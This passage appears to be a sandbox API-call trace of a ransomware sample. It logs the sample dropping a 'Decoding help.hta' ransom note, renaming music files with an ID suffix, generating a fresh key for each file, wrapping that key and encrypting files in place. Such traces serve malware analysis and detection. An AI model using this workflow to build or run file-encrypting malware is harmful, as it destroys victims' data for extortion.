lpString2="WwanSvc" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc" [0041.622] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WwanSvc\\*.*" [0041.622] GlobalMemoryStatus (in: lpBuffer=0x638fd10 | out: lpBuffer=0x638fd10) [0041.622] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x113dc5e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x224 [0041.623] CloseHandle (hObject=0x224) returned 1 [0041.623] FindNextFileW (in: hFindFile=0x5a5ab0, lpFindFileData=0x638fd30 | out: lpFindFileData=0x638fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 0 [0041.948] FindClose (in: hFindFile=0x5a5ab0 | out: hFindFile=0x5a5ab0) returned 1 Thread: id = 176 os_tid = 0x6ac [0040.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*", lpFindFileData=0xdbcfd30 | out: lpFindFileData=0xdbcfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffd0dd0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xffd0dd0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5af0 [0040.345] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.345] FindNextFileW (in: hFindFile=0x5a5af0, lpFindFileData=0xdbcfd30 | out: lpFindFileData=0xdbcfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffd0dd0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xffd0dd0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.345] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.345] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.345] FindNextFileW (in: hFindFile=0x5a5af0, lpFindFileData=0xdbcfd30 | out: lpFindFileData=0xdbcfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.346] lstrcpyW (in: lpString1=0x41e84d0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0040.346] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0040.346] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" [0040.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\decoding help.hta")) returned 0xffffffff [0040.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x270 [0040.775] WriteFile (in: hFile=0x270, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xdbcfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.775] CloseHandle (hObject=0x270) returned 1 [0040.776] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.171] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.171] lstrlenW (lpString="desktop.ini") returned 11 [0041.171] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0041.171] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0041.171] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" [0041.171] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" [0041.171] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0041.172] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0041.172] CryptAcquireContextA (in: phProv=0xdbcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdbcfcec*=0x34491c0) returned 1 [0043.794] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0xdbcfce8 | out: phKey=0xdbcfce8*=0x5d8590) returned 1 [0043.794] CryptExportKey (in: hKey=0x5d8590, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdbcfbe4, pdwDataLen=0xdbcfce4 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfce4*=0x2c) returned 1 [0043.794] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e0) returned 0x4410000 [0043.796] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x100) returned 1 [0043.796] CryptEncrypt (in: hKey=0x5d8590, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0xdbcfce4*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x4410000*, pdwDataLen=0xdbcfce4*=0x1e0) returned 1 [0043.796] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.798] CloseHandle (hObject=0x3c4) returned 1 [0043.798] CryptDestroyKey (hKey=0x5d8590) returned 1 [0043.798] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0043.798] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.798] WriteFile (in: hFile=0x3c0, lpBuffer=0xdbcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xdbcfbe4*, lpNumberOfBytesWritten=0xdbcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.799] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdbcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.799] CloseHandle (hObject=0x3c0) returned 1 [0043.800] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.800] FindNextFileW (in: hFindFile=0x5a5af0, lpFindFileData=0xdbcfd30 | out: lpFindFileData=0xdbcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d8ce480, ftCreationTime.dwHighDateTime=0x1d4d3d3, ftLastAccessTime.dwLowDateTime=0xd47830, ftLastAccessTime.dwHighDateTime=0x1d4d563, ftLastWriteTime.dwLowDateTime=0xd47830, ftLastWriteTime.dwHighDateTime=0x1d4d563, nFileSizeHigh=0x0, nFileSizeLow=0x749c, dwReserved0=0x0, dwReserved1=0x0, cFileName="gY9c9qHwmstPknB2E15Y.m4a", cAlternateFileName="GY9C9Q~1.M4A")) returned 1 [0043.800] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0043.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0043.800] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" [0043.800] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\decoding help.hta")) returned 0x1 [0043.800] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gY9c9qHwmstPknB2E15Y.m4a") returned -1 [0043.800] lstrlenW (lpString="gY9c9qHwmstPknB2E15Y.m4a") returned 24 [0043.800] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0043.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0043.800] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="gY9c9qHwmstPknB2E15Y.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a" [0043.800] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a" [0043.800] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a.[ID]g9uZrLhJaygpwRm1[ID]" [0043.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gy9c9qhwmstpknb2e15y.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gy9c9qhwmstpknb2e15y.m4a.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gy9c9qhwmstpknb2e15y.m4a.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0043.801] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0043.801] CryptAcquireContextA (in: phProv=0xdbcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdbcfcec*=0x34491c0) returned 1 [0043.802] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0xdbcfce8 | out: phKey=0xdbcfce8*=0x5a59f0) returned 1 [0043.802] CryptExportKey (in: hKey=0x5a59f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdbcfbe4, pdwDataLen=0xdbcfce4 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfce4*=0x2c) returned 1 [0043.802] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7480) returned 0x4410000 [0043.804] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x100) returned 1 [0043.804] CryptEncrypt (in: hKey=0x5a59f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0xdbcfce4*=0x7480, dwBufLen=0x7480 | out: pbData=0x4410000*, pdwDataLen=0xdbcfce4*=0x7480) returned 1 [0043.804] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.806] CloseHandle (hObject=0x3c4) returned 1 [0043.806] CryptDestroyKey (hKey=0x5a59f0) returned 1 [0043.806] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0043.806] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.806] WriteFile (in: hFile=0x3c0, lpBuffer=0xdbcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xdbcfbe4*, lpNumberOfBytesWritten=0xdbcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.807] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdbcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.807] CloseHandle (hObject=0x3c0) returned 1 [0043.808] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gY9c9qHwmstPknB2E15Y.m4a.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.808] FindNextFileW (in: hFindFile=0x5a5af0, lpFindFileData=0xdbcfd30 | out: lpFindFileData=0xdbcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f645f90, ftCreationTime.dwHighDateTime=0x1d4d315, ftLastAccessTime.dwLowDateTime=0x9b7eb670, ftLastAccessTime.dwHighDateTime=0x1d4d054, ftLastWriteTime.dwLowDateTime=0x9b7eb670, ftLastWriteTime.dwHighDateTime=0x1d4d054, nFileSizeHigh=0x0, nFileSizeLow=0x10486, dwReserved0=0x0, dwReserved1=0x0, cFileName="HDGHAY1I-BXzP_H.m4a", cAlternateFileName="HDGHAY~1.M4A")) returned 1 [0043.808] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0043.808] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0043.808] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" [0043.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\decoding help.hta")) returned 0x1 [0043.808] lstrcmpiW (lpString1="Decoding help.hta", lpString2="HDGHAY1I-BXzP_H.m4a") returned -1 [0043.808] lstrlenW (lpString="HDGHAY1I-BXzP_H.m4a") returned 19 [0043.808] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0043.808] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0043.808] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="HDGHAY1I-BXzP_H.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a" [0043.808] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a" [0043.808] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a.[ID]g9uZrLhJaygpwRm1[ID]" [0043.808] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hdghay1i-bxzp_h.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hdghay1i-bxzp_h.m4a.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hdghay1i-bxzp_h.m4a.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0043.814] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0043.814] CryptAcquireContextA (in: phProv=0xdbcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdbcfcec*=0x34491c0) returned 1 [0043.815] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0xdbcfce8 | out: phKey=0xdbcfce8*=0x5a56f0) returned 1 [0043.815] CryptExportKey (in: hKey=0x5a56f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdbcfbe4, pdwDataLen=0xdbcfce4 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfce4*=0x2c) returned 1 [0043.815] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10480) returned 0x49e0000 [0043.817] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x100) returned 1 [0043.817] CryptEncrypt (in: hKey=0x5a56f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x49e0000, pdwDataLen=0xdbcfce4*=0x10480, dwBufLen=0x10480 | out: pbData=0x49e0000*, pdwDataLen=0xdbcfce4*=0x10480) returned 1 [0043.818] UnmapViewOfFile (lpBaseAddress=0x49e0000) returned 1 [0043.820] CloseHandle (hObject=0x3c4) returned 1 [0043.820] CryptDestroyKey (hKey=0x5a56f0) returned 1 [0043.820] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0043.820] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.820] WriteFile (in: hFile=0x3c0, lpBuffer=0xdbcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xdbcfbe4*, lpNumberOfBytesWritten=0xdbcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.821] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdbcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.821] CloseHandle (hObject=0x3c0) returned 1 [0043.822] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HDGHAY1I-BXzP_H.m4a.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.822] FindNextFileW (in: hFindFile=0x5a5af0, lpFindFileData=0xdbcfd30 | out: lpFindFileData=0xdbcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af958d0, ftCreationTime.dwHighDateTime=0x1d4d234, ftLastAccessTime.dwLowDateTime=0x3be85660, ftLastAccessTime.dwHighDateTime=0x1d4c6a6, ftLastWriteTime.dwLowDateTime=0x3be85660, ftLastWriteTime.dwHighDateTime=0x1d4c6a6, nFileSizeHigh=0x0, nFileSizeLow=0x106b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="I1fpTZ.m4a", cAlternateFileName="")) returned 1 [0043.822] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0043.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0043.822] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" [0043.822] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\decoding help.hta")) returned 0x1 [0043.822] lstrcmpiW (lpString1="Decoding help.hta", lpString2="I1fpTZ.m4a") returned -1 [0043.822] lstrlenW (lpString="I1fpTZ.m4a") returned 10 [0043.822] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: 